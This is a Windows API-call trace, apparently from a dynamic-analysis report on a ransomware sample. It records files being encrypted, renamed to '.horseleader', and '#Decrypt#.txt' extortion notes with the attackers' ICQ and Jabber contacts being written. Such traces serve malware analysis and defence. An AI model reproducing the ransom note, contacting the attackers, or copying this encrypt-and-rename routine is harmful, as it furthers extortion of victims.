pszDest="\\\\?\\C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Resources\\1033") returned 75 [0252.201] lstrcmpW 
(lpString1="1033", lpString2=".") returned 1 [0252.201] lstrcmpW (lpString1="1033", lpString2="..") returned 1 [0252.201] lstrcmpW (lpString1="\\\\?\\C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Resources\\1033", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned -1 [0252.201] GetProcessHeap () returned 0x780000 [0252.201] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7e3120 [0252.201] wnsprintfW (in: pszDest=0x7e3120, cchDest=1024, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Resources\\1033\\*") returned 77 [0252.201] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Resources\\1033\\*", lpFindFileData=0x32ae928 | out: lpFindFileData=0x32ae928*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfa1d4a90, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xfa1d4a90, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xfa1d4a90, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6d71033, dwReserved1=0x53fb1b5c, cFileName=".", cAlternateFileName="")) returned 0x7c68a0 [0252.203] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0252.203] wnsprintfW (in: pszDest=0x7e3120, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Resources\\1033\\.") returned 77 [0252.203] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0252.203] FindNextFileW (in: hFindFile=0x7c68a0, lpFindFileData=0x32ae928 | out: lpFindFileData=0x32ae928*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfa1d4a90, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xfa1d4a90, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xfa1d4a90, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6d71033, 
dwReserved1=0x53fb1b5c, cFileName="..", cAlternateFileName="")) returned 1 [0252.203] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0252.203] wnsprintfW (in: pszDest=0x7e3120, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Resources\\1033\\..") returned 78 [0252.203] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0252.203] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0252.203] FindNextFileW (in: hFindFile=0x7c68a0, lpFindFileData=0x32ae928 | out: lpFindFileData=0x32ae928*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd9f68100, ftCreationTime.dwHighDateTime=0x1c9b09b, ftLastAccessTime.dwLowDateTime=0xfa1d4a90, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xd9f68100, ftLastWriteTime.dwHighDateTime=0x1c9b09b, nFileSizeHigh=0x0, nFileSizeLow=0xa2b58, dwReserved0=0x6d71033, dwReserved1=0x53fb1b5c, cFileName="msmdsrv.rll", cAlternateFileName="")) returned 1 [0252.203] lstrcmpiW (lpString1="msmdsrv.rll", lpString2="Windows") returned -1 [0252.203] wnsprintfW (in: pszDest=0x7e3120, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Resources\\1033\\msmdsrv.rll") returned 87 [0252.203] StrStrIW (lpFirst="msmdsrv.rll", lpSrch=".horseleader") returned 0x0 [0252.203] lstrcmpW (lpString1="msmdsrv.rll", lpString2="#Decrypt#.txt") returned 1 [0252.203] lstrcmpW (lpString1="msmdsrv.rll", lpString2="_uninstalling_.png") returned 1 [0252.204] lstrlenW (lpString=".testttjffg") returned 11 [0252.204] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Resources\\1033\\msmdsrv.rll", lpSrch=".testttjffg") returned 0x0 [0252.204] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32ae820 | out: pbBuffer=0x32ae820) returned 1 [0252.204] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32ae820*, pdwDataLen=0x32ae8dc*=0x24, 
dwBufLen=0x80 | out: pbData=0x32ae820*, pdwDataLen=0x32ae8dc*=0x80) returned 1 [0252.204] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Resources\\1033\\msmdsrv.rll" (normalized: "c:\\program files\\microsoft analysis services\\as oledb\\10\\resources\\1033\\msmdsrv.rll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x15c [0252.205] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Resources\\1033\\msmdsrv.rll") returned 87 [0252.205] StrStrW (lpFirst="msmdsrv.rll", lpSrch=".txt") returned 0x0 [0252.205] GetFileSizeEx (in: hFile=0x15c, lpFileSize=0x32ae8e0 | out: lpFileSize=0x32ae8e0*=666456) returned 1 [0252.205] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0252.205] ReadFile (in: hFile=0x15c, lpBuffer=0x32a9820, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32ae904, lpOverlapped=0x0 | out: lpBuffer=0x32a9820*, lpNumberOfBytesRead=0x32ae904*=0x5000, lpOverlapped=0x0) returned 1 [0252.252] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0252.252] WriteFile (in: hFile=0x15c, lpBuffer=0x32a9820*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32ae904, lpOverlapped=0x0 | out: lpBuffer=0x32a9820*, lpNumberOfBytesWritten=0x32ae904*=0x5000, lpOverlapped=0x0) returned 1 [0252.253] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0x4edac, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0252.254] ReadFile (in: hFile=0x15c, lpBuffer=0x32a9820, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32ae904, lpOverlapped=0x0 | out: lpBuffer=0x32a9820*, lpNumberOfBytesRead=0x32ae904*=0x5000, lpOverlapped=0x0) returned 1 [0252.256] 
SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0252.256] WriteFile (in: hFile=0x15c, lpBuffer=0x32a9820*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32ae904, lpOverlapped=0x0 | out: lpBuffer=0x32a9820*, lpNumberOfBytesWritten=0x32ae904*=0x5000, lpOverlapped=0x0) returned 1 [0252.256] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0x9db58, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0252.256] ReadFile (in: hFile=0x15c, lpBuffer=0x32a9820, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32ae904, lpOverlapped=0x0 | out: lpBuffer=0x32a9820*, lpNumberOfBytesRead=0x32ae904*=0x5000, lpOverlapped=0x0) returned 1 [0252.259] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0252.259] WriteFile (in: hFile=0x15c, lpBuffer=0x32a9820*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32ae904, lpOverlapped=0x0 | out: lpBuffer=0x32a9820*, lpNumberOfBytesWritten=0x32ae904*=0x5000, lpOverlapped=0x0) returned 1 [0252.259] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0252.259] WriteFile (in: hFile=0x15c, lpBuffer=0x32ae8d8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32ae904, lpOverlapped=0x0 | out: lpBuffer=0x32ae8d8*, lpNumberOfBytesWritten=0x32ae904*=0x4, lpOverlapped=0x0) returned 1 [0252.259] WriteFile (in: hFile=0x15c, lpBuffer=0x32ae820*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32ae904, lpOverlapped=0x0 | out: lpBuffer=0x32ae820*, lpNumberOfBytesWritten=0x32ae904*=0x80, lpOverlapped=0x0) returned 1 [0252.259] CloseHandle (hObject=0x15c) returned 1 [0252.260] GetProcessHeap () returned 0x780000 [0252.260] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7e4970 
[0252.260] wnsprintfW (in: pszDest=0x7e4970, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Resources\\1033\\msmdsrv.rll.horseleader") returned 99 [0252.260] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Resources\\1033\\msmdsrv.rll" (normalized: "c:\\program files\\microsoft analysis services\\as oledb\\10\\resources\\1033\\msmdsrv.rll"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Resources\\1033\\msmdsrv.rll.horseleader" (normalized: "c:\\program files\\microsoft analysis services\\as oledb\\10\\resources\\1033\\msmdsrv.rll.horseleader")) returned 1 [0252.261] GetProcessHeap () returned 0x780000 [0252.261] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7e4970 | out: hHeap=0x780000) returned 1 [0252.261] FindNextFileW (in: hFindFile=0x7c68a0, lpFindFileData=0x32ae928 | out: lpFindFileData=0x32ae928*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2512f000, ftCreationTime.dwHighDateTime=0x1c8e1fe, ftLastAccessTime.dwLowDateTime=0xfa1d4a90, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0x2512f000, ftLastWriteTime.dwHighDateTime=0x1c8e1fe, nFileSizeHigh=0x0, nFileSizeLow=0x3a18, dwReserved0=0x6d71033, dwReserved1=0x53fb1b5c, cFileName="msolui100.rll", cAlternateFileName="MSOLUI~1.RLL")) returned 1 [0252.261] lstrcmpiW (lpString1="msolui100.rll", lpString2="Windows") returned -1 [0252.261] wnsprintfW (in: pszDest=0x7e3120, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Resources\\1033\\msolui100.rll") returned 89 [0252.261] StrStrIW (lpFirst="msolui100.rll", lpSrch=".horseleader") returned 0x0 [0252.261] lstrcmpW (lpString1="msolui100.rll", lpString2="#Decrypt#.txt") returned 1 [0252.261] lstrcmpW (lpString1="msolui100.rll", lpString2="_uninstalling_.png") returned 1 [0252.261] lstrlenW 
(lpString=".testttjffg") returned 11 [0252.261] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Resources\\1033\\msolui100.rll", lpSrch=".testttjffg") returned 0x0 [0252.261] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32ae820 | out: pbBuffer=0x32ae820) returned 1 [0252.261] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32ae820*, pdwDataLen=0x32ae8dc*=0x24, dwBufLen=0x80 | out: pbData=0x32ae820*, pdwDataLen=0x32ae8dc*=0x80) returned 1 [0252.262] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Resources\\1033\\msolui100.rll" (normalized: "c:\\program files\\microsoft analysis services\\as oledb\\10\\resources\\1033\\msolui100.rll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x15c [0252.262] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Resources\\1033\\msolui100.rll") returned 89 [0252.262] StrStrW (lpFirst="msolui100.rll", lpSrch=".txt") returned 0x0 [0252.262] GetFileSizeEx (in: hFile=0x15c, lpFileSize=0x32ae8e0 | out: lpFileSize=0x32ae8e0*=14872) returned 1 [0252.262] ReadFile (in: hFile=0x15c, lpBuffer=0x32a9820, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32ae904, lpOverlapped=0x0 | out: lpBuffer=0x32a9820*, lpNumberOfBytesRead=0x32ae904*=0x3a18, lpOverlapped=0x0) returned 1 [0252.264] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0xffffc5e8, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0252.265] WriteFile (in: hFile=0x15c, lpBuffer=0x32a9820*, nNumberOfBytesToWrite=0x3a18, lpNumberOfBytesWritten=0x32ae904, lpOverlapped=0x0 | out: lpBuffer=0x32a9820*, lpNumberOfBytesWritten=0x32ae904*=0x3a18, lpOverlapped=0x0) returned 1 [0252.265] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0x0, lpNewFilePointer=0x0, 
dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0252.265] WriteFile (in: hFile=0x15c, lpBuffer=0x32ae8d8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32ae904, lpOverlapped=0x0 | out: lpBuffer=0x32ae8d8*, lpNumberOfBytesWritten=0x32ae904*=0x4, lpOverlapped=0x0) returned 1 [0252.265] WriteFile (in: hFile=0x15c, lpBuffer=0x32ae820*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32ae904, lpOverlapped=0x0 | out: lpBuffer=0x32ae820*, lpNumberOfBytesWritten=0x32ae904*=0x80, lpOverlapped=0x0) returned 1 [0252.265] CloseHandle (hObject=0x15c) returned 1 [0252.265] GetProcessHeap () returned 0x780000 [0252.266] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7e4970 [0252.266] wnsprintfW (in: pszDest=0x7e4970, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Resources\\1033\\msolui100.rll.horseleader") returned 101 [0252.266] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Resources\\1033\\msolui100.rll" (normalized: "c:\\program files\\microsoft analysis services\\as oledb\\10\\resources\\1033\\msolui100.rll"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Resources\\1033\\msolui100.rll.horseleader" (normalized: "c:\\program files\\microsoft analysis services\\as oledb\\10\\resources\\1033\\msolui100.rll.horseleader")) returned 1 [0252.267] GetProcessHeap () returned 0x780000 [0252.267] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7e4970 | out: hHeap=0x780000) returned 1 [0252.267] FindNextFileW (in: hFindFile=0x7c68a0, lpFindFileData=0x32ae928 | out: lpFindFileData=0x32ae928*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2512f000, ftCreationTime.dwHighDateTime=0x1c8e1fe, ftLastAccessTime.dwLowDateTime=0xfa1d4a90, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0x2512f000, ftLastWriteTime.dwHighDateTime=0x1c8e1fe, nFileSizeHigh=0x0, 
nFileSizeLow=0x3a18, dwReserved0=0x6d71033, dwReserved1=0x53fb1b5c, cFileName="msolui100.rll", cAlternateFileName="MSOLUI~1.RLL")) returned 0 [0252.267] FindClose (in: hFindFile=0x7c68a0 | out: hFindFile=0x7c68a0) returned 1 [0252.267] wnsprintfW (in: pszDest=0x7e3120, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Resources\\1033\\#Decrypt#.txt") returned 89 [0252.267] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Resources\\1033\\#Decrypt#.txt" (normalized: "c:\\program files\\microsoft analysis services\\as oledb\\10\\resources\\1033\\#decrypt#.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0252.270] lstrlenA (lpString="All your files have been ENCRYPTED!!!\r\nWrite to our ICQ @Horseleader\r\nOr contact us via jabber - horseleader@xmpp.jp\r\nJabber client installation instructions:\r\nDownload the jabber (Pidgin) client from https://pidgin.im/download/windows/ \r\n\r\nAfter installation, the Pidgin client will prompt you to create a new account. 
\r\nClick - Add\r\nIn the -Protocol field, select XMPP \r\nIn -Username - come up with any name \r\nIn the field -domain - enter any jabber-server, there are a lot of them, for example - exploit.im \r\nCreate a password\r\nAt the bottom, put a tick -Create account \r\nClick add \r\nIf you selected -domain - exploit.im, then a new window should appear in which you will need to re-enter your data: \r\nUser \r\npassword \r\nYou will need to follow the link to the captcha (there you will see the characters that you need to enter in the field below) \r\nIf you don't understand our Pidgin client installation instructions, you can find many installation tutorials on youtube - https://www.youtube.com/results?search_query=pidgin+jabber+install \r\nIf you have not received a response from us then we may have technical problems and please write to us using Jaber here bigbosshorse@xmpp.jp or on icq \r\nAttention!\r\nDo not rename encrypted files. \r\nDo not try to decrypt your data using third party software, it may cause permanent data loss. \r\nDecryption of your files with the help of third parties may cause increased price (they add their fee to our) or you can become a victim of a scam. 
\r\ntell your unique ID\r\n") returned 1508 [0252.270] WriteFile (in: hFile=0x1a4, lpBuffer=0xb41ca0*, nNumberOfBytesToWrite=0x5e4, lpNumberOfBytesWritten=0x32ae920, lpOverlapped=0x0 | out: lpBuffer=0xb41ca0*, lpNumberOfBytesWritten=0x32ae920*=0x5e4, lpOverlapped=0x0) returned 1 [0252.271] lstrlenA (lpString="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") returned 1368 [0252.271] WriteFile (in: hFile=0x1a4, lpBuffer=0x7d1740*, nNumberOfBytesToWrite=0x558, lpNumberOfBytesWritten=0x32ae920, lpOverlapped=0x0 | out: lpBuffer=0x7d1740*, lpNumberOfBytesWritten=0x32ae920*=0x558, lpOverlapped=0x0) returned 1 [0252.271] CloseHandle (hObject=0x1a4) returned 1 [0252.271] GetProcessHeap () returned 0x780000 [0252.271] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7e3120 | out: hHeap=0x780000) returned 1 [0252.271] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfa1d4a90, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xfa1d4a90, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xfa1d4a90, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xaf16b5e4, dwReserved1=0x2f7bdf72, cFileName="1033", cAlternateFileName="")) returned 0 [0252.271] FindClose (in: hFindFile=0x7c6760 | out: hFindFile=0x7c6760) returned 1 [0252.271] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Resources\\#Decrypt#.txt") returned 84 [0252.272] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Resources\\#Decrypt#.txt" (normalized: "c:\\program files\\microsoft analysis services\\as oledb\\10\\resources\\#decrypt#.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) 
returned 0x158 [0252.272] lstrlenA (lpString="All your files have been ENCRYPTED!!!\r\nWrite to our ICQ @Horseleader\r\nOr contact us via jabber - horseleader@xmpp.jp\r\nJabber client installation instructions:\r\nDownload the jabber (Pidgin) client from https://pidgin.im/download/windows/ \r\n\r\nAfter installation, the Pidgin client will prompt you to create a new account. \r\nClick - Add\r\nIn the -Protocol field, select XMPP \r\nIn -Username - come up with any name \r\nIn the field -domain - enter any jabber-server, there are a lot of them, for example - exploit.im \r\nCreate a password\r\nAt the bottom, put a tick -Create account \r\nClick add \r\nIf you selected -domain - exploit.im, then a new window should appear in which you will need to re-enter your data: \r\nUser \r\npassword \r\nYou will need to follow the link to the captcha (there you will see the characters that you need to enter in the field below) \r\nIf you don't understand our Pidgin client installation instructions, you can find many installation tutorials on youtube - https://www.youtube.com/results?search_query=pidgin+jabber+install \r\nIf you have not received a response from us then we may have technical problems and please write to us using Jaber here bigbosshorse@xmpp.jp or on icq \r\nAttention!\r\nDo not rename encrypted files. \r\nDo not try to decrypt your data using third party software, it may cause permanent data loss. \r\nDecryption of your files with the help of third parties may cause increased price (they add their fee to our) or you can become a victim of a scam. 
\r\ntell your unique ID\r\n") returned 1508 [0252.272] WriteFile (in: hFile=0x158, lpBuffer=0xb41ca0*, nNumberOfBytesToWrite=0x5e4, lpNumberOfBytesWritten=0x32aeb98, lpOverlapped=0x0 | out: lpBuffer=0xb41ca0*, lpNumberOfBytesWritten=0x32aeb98*=0x5e4, lpOverlapped=0x0) returned 1 [0252.273] lstrlenA (lpString="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") returned 1368 [0252.274] WriteFile (in: hFile=0x158, lpBuffer=0x7d1740*, nNumberOfBytesToWrite=0x558, lpNumberOfBytesWritten=0x32aeb98, lpOverlapped=0x0 | out: lpBuffer=0x7d1740*, lpNumberOfBytesWritten=0x32aeb98*=0x558, lpOverlapped=0x0) returned 1 [0252.274] CloseHandle (hObject=0x158) returned 1 [0252.274] GetProcessHeap () returned 0x780000 [0252.274] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0252.274] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfa1d4a90, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xfa1d4a90, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xfa1d4a90, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x7e1110, dwReserved1=0xd3dda4fd, cFileName="Resources", cAlternateFileName="RESOUR~1")) returned 0 [0252.274] FindClose (in: hFindFile=0x7c6860 | out: hFindFile=0x7c6860) returned 1 [0252.274] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\#Decrypt#.txt") returned 74 [0252.274] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\#Decrypt#.txt" (normalized: "c:\\program files\\microsoft analysis services\\as oledb\\10\\#decrypt#.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x21c 
[0252.275] lstrlenA (lpString="All your files have been ENCRYPTED!!!\r\nWrite to our ICQ @Horseleader\r\nOr contact us via jabber - horseleader@xmpp.jp\r\nJabber client installation instructions:\r\nDownload the jabber (Pidgin) client from https://pidgin.im/download/windows/ \r\n\r\nAfter installation, the Pidgin client will prompt you to create a new account. \r\nClick - Add\r\nIn the -Protocol field, select XMPP \r\nIn -Username - come up with any name \r\nIn the field -domain - enter any jabber-server, there are a lot of them, for example - exploit.im \r\nCreate a password\r\nAt the bottom, put a tick -Create account \r\nClick add \r\nIf you selected -domain - exploit.im, then a new window should appear in which you will need to re-enter your data: \r\nUser \r\npassword \r\nYou will need to follow the link to the captcha (there you will see the characters that you need to enter in the field below) \r\nIf you don't understand our Pidgin client installation instructions, you can find many installation tutorials on youtube - https://www.youtube.com/results?search_query=pidgin+jabber+install \r\nIf you have not received a response from us then we may have technical problems and please write to us using Jaber here bigbosshorse@xmpp.jp or on icq \r\nAttention!\r\nDo not rename encrypted files. \r\nDo not try to decrypt your data using third party software, it may cause permanent data loss. \r\nDecryption of your files with the help of third parties may cause increased price (they add their fee to our) or you can become a victim of a scam. 
\r\ntell your unique ID\r\n") returned 1508 [0252.275] WriteFile (in: hFile=0x21c, lpBuffer=0xb41ca0*, nNumberOfBytesToWrite=0x5e4, lpNumberOfBytesWritten=0x32aee10, lpOverlapped=0x0 | out: lpBuffer=0xb41ca0*, lpNumberOfBytesWritten=0x32aee10*=0x5e4, lpOverlapped=0x0) returned 1 [0252.276] lstrlenA (lpString="JWlzFd8ig4lNkIDqwk+OENg4xlYNIx+NYIIF2OITBbD5JB7PBCcH3DgT1yh4fLafWmPtVPJJ4wOSwYaLTam0t4RSiLOfjpC/u2+qPesk2aAejZmqIsYtucFLyI+7BoJGZuIs+z9UEuIYWzSdwDBewCphBxeDDT4RZKXmvwqf4jlsmMcXrEAhZNUu3GWL2bfT2aSDm7Nq4x24t44ckuClkeUi1Qzl0yyj4LLiRZeENVv89loGfBrMZaDRfyPQg7w6IvoUnqffqS6sB9AH7TSxebCaoSfiqXOdCWmMZ27T/s4SMrW2QbW4ZPfEKQpA3q3P8MFwfbpLyqo9cSAaxeQE84jYCoIM+xygruhfWrdJgxEOP5npcM30AAcVQNFpTKCiruCOXwCgc9ZqZJPow02eJYtG83PAxpXrbJ0w+7vGDZUYIcPyX8U+xDg1W0HEDDlYsCmRoIoJefUdFCIhWH4HyqGOnyx5UPzBzKgzM/72Q+a3rRwLTDj0v/rk6/dW8ghlTdAhxo0zl+DrJf9wFOIt0oAXQXL/rww96vUHb3jSE3i9GLhsVCDQ0RuW/fQsohzJ17oNguBmOwN0Hry/hzP2EgUgzLKERaymnsmN2W315Oz6XYg3+ZDJ8eP02rTITXKNRplxtQ/9dBgsF7EnQTuEDkHTEEbisTnKOL9aoou2ZDRK9BtknsYZhYquE/b2YEU0OWgNpGBYVvbG8BrVUl59OfojuYOtXVE41A6fIwMW0q9pd9ZLP6VJHEwQF6Vo5bzoDphmaO3dmDJMhY+6Xfm9EEb9aGu9i7TbvL6ZZOgO7i8T2szsq/ikGzrk3Jy68HWJRuwGKpD0irJUgHAs0fMqO2UBeA6onVYxtk1wVEJ1YLKDhuEZFda91rxQUDKVp1VfFvwuLLk0v86XsRDh5/++cwIBhMBVQiEtr7b9CfuF2H1z/VPELTk9Inx7LS725YE2gZwJqwDRLN3xeFColVc+AFRQ3zH/IcGVB1QD3lG32ko7AaR7ZhR5HgyMnGjVT0rBCUdj3uoYipP9UeOtxFa2ZfsOzaqCAqSnLCw9UZyUwj/qFxNvJ+ejulcfIYsVZHpkW5iyJKcyuIXs/KOuy/hpeUS7qDsDp1MoRkYrHisBbP5MXcQlCYgSq+IgkVqjapXZHXac8G9CvZdqMUyJahaJeW5PujhPfXK0kJB+aLqpVvF1uFiyCf1I2gVENNFf6hOjImA1x7BGRN6fA/qbuPUMcyGX9QECp6+o4xtyFp5jE5MGy6f9REEF/D7D/7V0JSoFaoylGz8JreWMeKNvJi1ek/ExUWrZOwxK8lYKKw6EeEPxXFlORrPY5TRR1GPxOvYz6hQ1aQYKSqXK5dEzwMWZjA==") returned 1368 [0252.276] WriteFile (in: hFile=0x21c, lpBuffer=0x7d1740*, nNumberOfBytesToWrite=0x558, lpNumberOfBytesWritten=0x32aee10, lpOverlapped=0x0 | out: lpBuffer=0x7d1740*, lpNumberOfBytesWritten=0x32aee10*=0x558, lpOverlapped=0x0) returned 1 [0252.276] CloseHandle (hObject=0x21c) returned 1 [0252.276] 
